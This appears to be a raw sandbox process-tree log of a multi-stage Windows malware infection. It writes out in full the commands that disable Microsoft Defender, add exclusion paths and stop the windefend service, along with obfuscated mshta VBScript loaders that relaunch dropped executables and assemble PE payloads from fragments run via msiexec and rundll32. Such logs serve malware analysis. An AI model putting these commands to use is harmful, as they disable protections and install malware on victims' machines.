C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12fb2a5c52f05816.exe5⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exeWed12fb2a5c52f05816.exe6⤵
- Executes dropped EXE
PID:3292 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT( "wSCrIpT.shell").RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If """"=="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"") do taskkill -F -IM ""%~nxE"" " ,0, TRUe ) )7⤵PID:4308
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe" VAKlCUnlQu.exe&& STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If ""=="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe") do taskkill -F -IM "%~nxE"8⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exeVAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm9⤵
- Executes dropped EXE
PID:5964 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT( "wSCrIpT.shell").RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If ""-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm ""=="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"") do taskkill -F -IM ""%~nxE"" " ,0, TRUe ) )10⤵PID:5088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe" VAKlCUnlQu.exe&& STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If "-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm "=="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe") do taskkill -F -IM "%~nxE"11⤵PID:3248
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt: cLoSE ( CREaTEOBjECt( "wSCRiPt.shell" ). RUn ( "cmD.exE /c eCHo | SEt /P = ""MZ"" > s4AW._YK & CoPy /B /y s4aW._YK + 4kt1N2.SAG +JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.3 ", 0 ,TRuE) )10⤵PID:5892
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | SEt /P = "MZ" > s4AW._YK & CoPy /B /y s4aW._YK+ 4kt1N2.SAG+JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.311⤵PID:5156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>s4AW._YK"12⤵PID:6576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵PID:6564
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\CFIFB.312⤵
- Loads dropped DLL
PID:6760
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "Wed12fb2a5c52f05816.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1217e6a0ef74ed.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1217e6a0ef74ed.exeWed1217e6a0ef74ed.exe6⤵
- Executes dropped EXE
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12bcd18bdbc441.exe5⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12bcd18bdbc441.exeWed12bcd18bdbc441.exe6⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12859e3c1cf63b6a0.exe5⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exeWed12859e3c1cf63b6a0.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exe7⤵
- Executes dropped EXE
PID:5532
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12fbb08f1dfc28.exe5⤵PID:2224
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fbb08f1dfc28.exeWed12fbb08f1dfc28.exe6⤵
- Executes dropped EXE
PID:1116 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 2447⤵
- Program crash
PID:5348
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12ebaf7883e1890d.exe5⤵PID:8
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12ebaf7883e1890d.exeWed12ebaf7883e1890d.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1241cc206cfb.exe5⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1241cc206cfb.exeWed1241cc206cfb.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Users\Admin\AppData\Roaming\6736747.exe"C:\Users\Admin\AppData\Roaming\6736747.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
C:\Users\Admin\AppData\Roaming\227470.exe"C:\Users\Admin\AppData\Roaming\227470.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5228
-
-
C:\Users\Admin\AppData\Roaming\3551538.exe"C:\Users\Admin\AppData\Roaming\3551538.exe"7⤵PID:5628
-
-
C:\Users\Admin\AppData\Roaming\3601344.exe"C:\Users\Admin\AppData\Roaming\3601344.exe"7⤵
- Executes dropped EXE
PID:6128 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))8⤵PID:5548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\3601344.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\3601344.exe" ) do taskkill -f -Im "%~NXZ"9⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i10⤵
- Executes dropped EXE
PID:6912 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))11⤵PID:7020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"12⤵PID:7144
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )11⤵PID:6560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *12⤵PID:6136
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"13⤵PID:6292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "13⤵PID:3028
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K13⤵PID:1032
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K14⤵
- Loads dropped DLL
PID:720 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5844 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K16⤵
- Loads dropped DLL
PID:7108
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "3601344.exe"10⤵
- Kills process with taskkill
PID:7008
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\189629.exe"C:\Users\Admin\AppData\Roaming\189629.exe"7⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:6204
-
-
-
C:\Users\Admin\AppData\Roaming\503782.exe"C:\Users\Admin\AppData\Roaming\503782.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5644
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed121f7e9e92793cf.exe5⤵PID:2384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed129eb9b8859.exe5⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed129eb9b8859.exeWed129eb9b8859.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1812 -
C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"7⤵
- Executes dropped EXE
PID:5752
-
-
C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe"C:\Users\Admin\Pictures\Adobe Films\CUdVFaUwSqvIYDEDWI1VHn3_.exe"7⤵
- Executes dropped EXE
PID:2960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6288
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe"C:\Users\Admin\Pictures\Adobe Films\PsHhTfowuIHRylZl4gkpCI9u.exe"7⤵
- Executes dropped EXE
PID:408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 2808⤵
- Program crash
- Enumerates system info in registry
PID:4640
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"7⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System policy modification
PID:5956 -
C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\acfd18df-7bf3-438a-b223-d663daf805dc\test.bat"9⤵PID:6472
-
-
-
C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f1365d3d-b11e-4e52-9a7b-f9e9ac80ba64\test.bat"9⤵PID:6392
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵PID:7116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵PID:6524
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵PID:6632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force8⤵
- Executes dropped EXE
PID:1548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force8⤵PID:3416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵PID:6668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1460
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force8⤵PID:1164
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force8⤵PID:2552
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"8⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\75874e51-47d4-4380-afdb-099684f05875\test.bat"10⤵PID:4068
-
C:\Windows\system32\sc.exesc stop windefend11⤵PID:6724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:6896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d96e0bdc-f750-403a-8fa4-f90aedee2def\test.bat"10⤵PID:6076
-
C:\Windows\system32\sc.exesc stop windefend11⤵PID:888
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵PID:6196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵PID:3260
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force9⤵PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵PID:2248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force9⤵PID:3320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force9⤵PID:8352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"9⤵PID:8788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"9⤵PID:7368
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force8⤵PID:6800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"8⤵PID:1180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"8⤵PID:6416
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"8⤵PID:7452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"8⤵PID:7840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"8⤵PID:8096
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:7472
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe"C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe"7⤵PID:5932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 18688⤵
- Program crash
- Enumerates system info in registry
PID:7156
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6004 -
C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5592
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"7⤵PID:1548
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵PID:920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" ) do taskkill -im "%~NxK" -F9⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
- Executes dropped EXE
PID:1080 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵PID:6324
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵PID:6532
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵PID:6736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵PID:6396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵PID:7960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:7952
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
PID:8760
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "YROaLuGWqMiLNO5MI0NxWjDx.exe" -F10⤵
- Kills process with taskkill
PID:5152
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"7⤵PID:5348
-
